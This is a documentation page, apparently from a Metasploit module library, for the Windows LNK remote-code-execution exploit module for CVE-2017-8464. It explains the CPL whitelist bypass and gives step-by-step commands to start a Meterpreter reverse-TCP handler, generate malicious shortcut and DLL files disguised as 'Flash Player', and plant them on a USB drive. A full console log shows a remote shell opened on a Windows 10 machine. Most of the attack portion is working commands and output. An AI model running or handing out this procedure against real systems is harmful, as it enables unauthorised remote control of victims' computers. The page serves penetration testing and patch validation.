LNK Code Execution Vulnerability - Metasploit


This page contains detailed information about how to use the exploit/windows/fileformat/cve_2017_8464_lnk_rce metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Table Of Contents
hide

Module Overview

Name: LNK Code Execution Vulnerability
Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
Source code: modules/exploits/windows/fileformat/cve_2017_8464_lnk_rce.rb
Disclosure date: 2017-06-13
Last modification time: 2020-10-02 17:38:06 +0000
Supported architecture(s): x86, x64
Supported platform(s): Windows
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2015-0096, CVE-2017-8464

This module exploits a vulnerability in the handling of Windows Shortcut files (.LNK) that contain a dynamic icon, loaded from a malicious DLL. This vulnerability is a variant of MS15-020 (CVE-2015-0096). The created LNK file is similar except an additional SpecialFolderDataBlock is included. The folder ID set in this SpecialFolderDataBlock is set to the Control Panel. This is enough to bypass the CPL whitelist. This bypass can be used to trick Windows into loading an arbitrary DLL file. If no PATH is specified, the module will use drive letters D through Z so the files may be placed in the root path of a drive such as a shared VM folder or USB drive.

Module Ranking and Traits

Module Ranking:

  • excellent: The exploit will never crash the service. This is the case for SQL Injection, CMD execution, RFI, LFI, etc. No typical memory corruption exploits should be given this ranking unless there are extraordinary circumstances. More information about ranking can be found here.

Stability:

  • crash-service-restarts: Module may crash the service, but the service restarts.

Basic Usage

msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > show targets
    ... a list of targets ...
msf exploit(cve_2017_8464_lnk_rce) > set TARGET target-id
msf exploit(cve_2017_8464_lnk_rce) > show options
    ... show and set options ...
msf exploit(cve_2017_8464_lnk_rce) > exploit

Knowledge Base

Vulnerable Application

This vulnerability affects any Windows version without the patch for CVE-2017-8464. The exploit does not appear to work with UNC drives. Because of this, the exploit DLL file needs to be on a local file system or an USB drive. A fix was released in the June 2017 Patch Tuesday.

Vulnerable Setup

To set up the vulnerable environment, install a Windows version without the patch for CVE-2017-8464.

Verification Steps

Start a handler

  1. use exploit/multi/handler
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST [ip victim connects back to]
  4. exploit -j

Run the exploit

  1. use exploit/windows/fileformat/cve_2017_8464_lnk_rce
  2. set PAYLOAD windows/x64/meterpreter/reverse_tcp
  3. set LHOST [ip victim connects back to]
  4. exploit

Copy files to USB drive & open on vulnerable system

  1. cp /root/.msf4/local/* [USB drive path]
  2. Insert device in target machine and browse to it

Options

FILENAME

The file name of the LNK file. This file name can be renamed later. If the value is not set, a random name will be generated.

DLLNAME

The file name of the DLL file. This file cannot be renamed, as this will invalidate the LNK file(s). If not set, a random name will be generated.

DRIVE

Drive letter assigned to USB drive on victim's machine. If not set, LNK files for drive D till Z will be created. Copy all these LNK files to the USB drive to increase the chance that the vulnerability will be triggered.

Windows 10 x64 (Build 14393)

msf > use exploit/multi/handler
msf exploit(handler) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(handler) > exploit -j
[*] Exploit running as background job.

[*] Started reverse TCP handler on 192.168.146.197:4444
[*] Starting the payload handler...
msf exploit(handler) > back
msf > use exploit/windows/fileformat/cve_2017_8464_lnk_rce
msf exploit(cve_2017_8464_lnk_rce) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf exploit(cve_2017_8464_lnk_rce) > set LHOST 192.168.146.197
LHOST => 192.168.146.197
msf exploit(cve_2017_8464_lnk_rce) > exploit

msf exploit(cve_2017_8464_lnk_rce) > exploit

[*] /root/.msf4/local/kNgYlztVprHPOmHY.dll created, copy it to the root folder of the target USB drive
[*] /root/.msf4/local/SoXXZhgCWEDkbDyA_D.lnk created, copy to the target USB drive
[*] /root/.msf4/local/rfuSAlSFEPmrgsBh_E.lnk created, copy to the target USB drive
[*] /root/.msf4/local/LydLhRBovVRINgUh_F.lnk created, copy to the target USB drive
[*] /root/.msf4/local/xbpnlkcQOYonGpKW_G.lnk created, copy to the target USB drive
[*] /root/.msf4/local/SezkrIUwqIVvMiOZ_H.lnk created, copy to the target USB drive
[*] /root/.msf4/local/UzsJRIdcpoZPpLEj_I.lnk created, copy to the target USB drive
[*] /root/.msf4/local/BxTkakFYhUaxSNyi_J.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dPdanTusElQRKzGZ_K.lnk created, copy to the target USB drive
[*] /root/.msf4/local/cKUaDslpjLshMEpP_L.lnk created, copy to the target USB drive
[*] /root/.msf4/local/RQPOxJeuGqVCQGNB_M.lnk created, copy to the target USB drive
[*] /root/.msf4/local/tLDnpaeIeUavIxqP_N.lnk created, copy to the target USB drive
[*] /root/.msf4/local/VVQOvhpqJYbhINIX_O.lnk created, copy to the target USB drive
[*] /root/.msf4/local/dAIEBrbaixsXjnnm_P.lnk created, copy to the target USB drive
[*] /root/.msf4/local/AoHnIQhKkpnYSOZR_Q.lnk created, copy to the target USB drive
[*] /root/.msf4/local/kZCCppTXKsuGRSCB_R.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vMBPqzoOEoJXhZqQ_S.lnk created, copy to the target USB drive
[*] /root/.msf4/local/ueCsaNzVsljfHKnS_T.lnk created, copy to the target USB drive
[*] /root/.msf4/local/TSCgPoYrFFnZqMsl_U.lnk created, copy to the target USB drive
[*] /root/.msf4/local/QFbXkQeBmCvXezNg_V.lnk created, copy to the target USB drive
[*] /root/.msf4/local/liPaOopqYJbBIrVY_W.lnk created, copy to the target USB drive
[*] /root/.msf4/local/eZiWpyEYbkWHqStW_X.lnk created, copy to the target USB drive
[*] /root/.msf4/local/PawzVPKmvBoSblhA_Y.lnk created, copy to the target USB drive
[*] /root/.msf4/local/vJhDzJUydwYxnLlp_Z.lnk created, copy to the target USB drive
msf exploit(cve_2017_8464_lnk_rce) >
[*] Sending stage (1189423 bytes) to 192.168.146.193
[*] Meterpreter session 1 opened (192.168.146.197:4444 -> 192.168.146.193:50020) at 2017-07-25 19:28:27 +0200
sessions -i 1
[*] Starting interaction with 1...

meterpreter > sysinfo
Computer        : DESKTOP-5G8HK7E
OS              : Windows 10 (Build 14393).
Architecture    : x64
System Language : en_US
Domain          : WORKGROUP
Logged On Users : 2
Meterpreter     : x64/windows
meterpreter >

Go back to menu.

Msfconsole Usage

Here is how the windows/fileformat/cve_2017_8464_lnk_rce exploit module looks in the msfconsole:

msf6 > use exploit/windows/fileformat/cve_2017_8464_lnk_rce

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show info

       Name: LNK Code Execution Vulnerability
     Module: exploit/windows/fileformat/cve_2017_8464_lnk_rce
   Platform: Windows
       Arch: x86, x64
 Privileged: No
    License: Metasploit Framework License (BSD)
       Rank: Excellent
  Disclosed: 2017-06-13

Provided by:
  Uncredited
  Yorick Koster
  Spencer McIntyre

Module stability:
 crash-service-restarts

Available targets:
  Id  Name
  --  ----
  0   Automatic
  1   Windows x64
  2   Windows x86

Check supported:
  No

Basic options:
  Name      Current Setting        Required  Description
  ----      ---------------        --------  -----------
  DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
  FILENAME  Flash Player.lnk       no        The LNK file
  PATH                             no        An explicit path to where the files will be hosted

Payload information:
  Space: 2048

Description:
  This module exploits a vulnerability in the handling of Windows 
  Shortcut files (.LNK) that contain a dynamic icon, loaded from a 
  malicious DLL. This vulnerability is a variant of MS15-020 
  (CVE-2015-0096). The created LNK file is similar except an 
  additional SpecialFolderDataBlock is included. The folder ID set in 
  this SpecialFolderDataBlock is set to the Control Panel. This is 
  enough to bypass the CPL whitelist. This bypass can be used to trick 
  Windows into loading an arbitrary DLL file. If no PATH is specified, 
  the module will use drive letters D through Z so the files may be 
  placed in the root path of a drive such as a shared VM folder or USB 
  drive.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2017-8464
  https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2017-8464
  http://www.vxjump.net/files/vuln_analysis/cve-2017-8464.txt
  https://msdn.microsoft.com/en-us/library/dd871305.aspx
  http://www.geoffchappell.com/notes/security/stuxnet/ctrlfldr.htm
  https://www.trendmicro.de/cloud-content/us/pdfs/security-intelligence/white-papers/wp-cpl-malware.pdf

Module Options

This is a complete list of options available in the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show options

Module options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name      Current Setting        Required  Description
   ----      ---------------        --------  -----------
   DLLNAME   FlashPlayerCPLApp.cpl  no        The DLL file containing the payload
   FILENAME  Flash Player.lnk       no        The LNK file
   PATH                             no        An explicit path to where the files will be hosted

Exploit target:

   Id  Name
   --  ----
   0   Automatic

Advanced Options

Here is a complete list of advanced options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show advanced

Module advanced options (exploit/windows/fileformat/cve_2017_8464_lnk_rce):

   Name                    Current Setting               Required  Description
   ----                    ---------------               --------  -----------
   ContextInformationFile                                no        The information file that contains context information
   DisablePayloadHandler   true                          no        Disable the handler code for the selected payload
   EXE::Custom                                           no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false                         no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false                         no        Use the default template in case the specified one is missing
   EXE::Inject             false                         no        Set to preserve the original EXE function
   EXE::OldMethod          false                         no        Set to use the substitution EXE generation method.
   EXE::Path                                             no        The directory in which to look for the executable template
   EXE::Template                                         no        The executable template file name.
   EnableContextEncoding   false                         no        Use transient context when encoding payloads
   LnkComment              Manage Flash Player Settings  yes       The comment to use in the generated LNK file
   LnkDisplayName          Flash Player                  yes       The display name to use in the generated LNK file
   MSI::Custom                                           no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false                         no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                             no        The directory in which to look for the msi template
   MSI::Template                                         no        The msi template file name
   MSI::UAC                false                         no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false                         no        Enable detailed status messages
   WORKSPACE                                             no        Specify the workspace for this module
   WfsDelay                2                             no        Additional delay in seconds to wait for a session

Exploit Targets

Here is a list of targets (platforms and systems) which the windows/fileformat/cve_2017_8464_lnk_rce module can exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Automatic
   1   Windows x64
   2   Windows x86

Compatible Payloads

This is a list of possible payloads which can be delivered and executed on the target system using the windows/fileformat/cve_2017_8464_lnk_rce exploit:

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show payloads

Evasion Options

Here is the full list of possible evasion options supported by the windows/fileformat/cve_2017_8464_lnk_rce exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(windows/fileformat/cve_2017_8464_lnk_rce) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

References

See Also

Check also the following modules related to this module:

Related Nessus plugins:

Authors

  • Uncredited
  • Yorick Koster
  • Spencer McIntyre

Version

This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.